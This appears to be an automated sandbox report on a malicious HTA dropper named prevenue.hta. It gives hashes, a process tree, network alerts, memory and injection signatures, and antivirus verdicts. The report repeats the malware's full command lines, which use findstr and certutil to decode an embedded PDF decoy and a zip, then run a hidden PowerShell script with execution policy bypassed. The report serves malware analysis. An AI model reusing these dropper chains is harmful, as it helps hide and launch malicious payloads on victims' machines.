Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 23, 2025, 12:09 p.m.	April 23, 2025, 12:11 p.m.

Size	195.6KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`a3353ea094f45915408065d03ae157c4`
SHA256	`3c2ea04090ad8c28116c42a9a2be5b240f135ac184e5a2c121b4eb311a7bf075`
CRC32	`A08F48AB`
ssdeep	`3072:UFFFUzMWnUpUZt9sqqIqCgnZaB9H1KyA/tEO0qTP+9SY1pE6K7eWczUVJ:KFUgXUZTsVjnZ6Va0yP+IKhK7Fr`
Yara	None matched

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\prevenue.hta.html
2612
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2612 CREDAT:145409
  2704
  - cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/prevenue.hta.html">1.log && certutil -decode -f 1.log revenue.pdf && del 1.log && revenue.pdf
    2928
    - findstr.exe findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/prevenue.hta.html"
      3052
  - cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/prevenue.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
    2984
    - findstr.exe findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/prevenue.hta.html"
      3060

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49173 -> 52.239.160.33:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49174 -> 52.239.160.33:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49173 52.239.160.33:443	C=US, O=Microsoft Corporation, CN=Microsoft Azure RSA TLS Issuing CA 03	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=*.web.core.windows.net	22:d9:a8:14:ff:86:7a:4b:f0:95:ea:b0:9f:c1:b5:62:6b:b0:62:a9
TLSv1 192.168.56.101:49174 52.239.160.33:443	C=US, O=Microsoft Corporation, CN=Microsoft Azure RSA TLS Issuing CA 03	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=*.web.core.windows.net	22:d9:a8:14:ff:86:7a:4b:f0:95:ea:b0:9f:c1:b5:62:6b:b0:62:a9

Allocates read-write-execute memory (usually to unpack itself) (50 out of 53 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2612 region_size: 4067328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002c30000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2612 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003010000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076a21000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076a21000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076a21000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076a21000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076a21000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076a21000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000769cd000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000769f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000769d4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000769f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefbca5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefbca5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefefc4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdcd1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000769ba000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2612 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003100000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 region_size: 7540736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002f10000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003640000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076a21000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076a21000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076a21000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076a21000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076a21000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076a21000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000769cd000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000769f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000769d4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000769f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefbca5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefbca5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefefc4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdcd1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000769ba000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000769bf000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000769bd000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000769bb000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c26000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d76000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c21000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000769c0000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000769ba000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d4f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d5b000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefda37000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefef64000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefef61000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefef66000 process_handle: 0xffffffffffffffff	1

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/prevenue.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
cmdline	cmd /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/prevenue.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
cmdline	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/prevenue.hta.html">1.log && certutil -decode -f 1.log revenue.pdf && del 1.log && revenue.pdf

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW April 23, 2025, 12:09 p.m.	show_type: 0 filepath_r: cmd parameters: /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/prevenue.hta.html">1.log && certutil -decode -f 1.log revenue.pdf && del 1.log && revenue.pdf filepath: cmd	1	1
CreateProcessInternalW April 23, 2025, 12:09 p.m.	thread_identifier: 2988 thread_handle: 0x00000000000004cc process_identifier: 2984 current_directory: C:\Users\test22\Desktop filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/prevenue.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000004b8	1	1
ShellExecuteExW April 23, 2025, 12:09 p.m.	show_type: 0 filepath_r: cmd parameters: /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/prevenue.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log filepath: cmd	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 65536 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x0000000003100000 process_handle: 0xffffffffffffffff	1	0	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (5 events)

cmdline	cmd /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/prevenue.hta.html">1.log && certutil -decode -f 1.log revenue.pdf && del 1.log && revenue.pdf
cmdline	"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2612 CREDAT:145409
cmdline	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/prevenue.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
cmdline	cmd /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/prevenue.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
cmdline	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/prevenue.hta.html">1.log && certutil -decode -f 1.log revenue.pdf && del 1.log && revenue.pdf

A command shell or script process was created by an unexpected parent process (2 events)

parent_process	iexplore.exe				martian_process	cmd /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/prevenue.hta.html">1.log && certutil -decode -f 1.log revenue.pdf && del 1.log && revenue.pdf
parent_process	iexplore.exe				martian_process	cmd /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/prevenue.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log

One or more non-whitelisted processes were created (4 events)

parent_process	iexplore.exe	martian_process	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/prevenue.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
parent_process	iexplore.exe	martian_process	cmd /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/prevenue.hta.html">1.log && certutil -decode -f 1.log revenue.pdf && del 1.log && revenue.pdf
parent_process	iexplore.exe	martian_process	cmd /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/prevenue.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
parent_process	iexplore.exe	martian_process	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/prevenue.hta.html">1.log && certutil -decode -f 1.log revenue.pdf && del 1.log && revenue.pdf

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2612 resumed a thread in remote process 2704
NtResumeThread April 23, 2025, 12:09 p.m.	thread_handle: 0x0000000000000360 suspend_count: 1 process_identifier: 2704	1	0	0

Creates a suspicious Powershell process (6 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

File has been identified by 20 AntiVirus engines on VirusTotal as malicious (20 events)

Lionic	Trojan.Script.SAgent.4!c
CTX	vba.trojan.sagent
CAT-QuickHeal	Script.Trojan.49422.GC
Skyhigh	VBS/Agent.ft
ALYac	Trojan.Script.Agent
Symantec	Trojan.Malscript
ESET-NOD32	VBS/TrojanDropper.Agent.PMU
TrendMicro-HouseCall	TROJ_FRS.VSNTCP25
Avast	Script:SNH-gen [Trj]
Kaspersky	HEUR:Trojan.HTA.SAgent.gen
Rising	Dropper.Agent/VBS!8.12129 (TOPIS:E0:AlftrrEomfC)
TrendMicro	TROJ_FRS.VSNTCP25
Ikarus	Trojan-Dropper.VBS.Agent
Google	Detected
Varist	ABTrojan.KQOO-
AhnLab-V3	Dropper/HTA.Agent.SC260939
McAfee	VBS/Agent.ft
Tencent	Win32.Trojan.Sagent.Pgil
AVG	Script:SNH-gen [Trj]
alibabacloud	Trojan[dropper]:Win/SAgent.gyf

prevenue.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All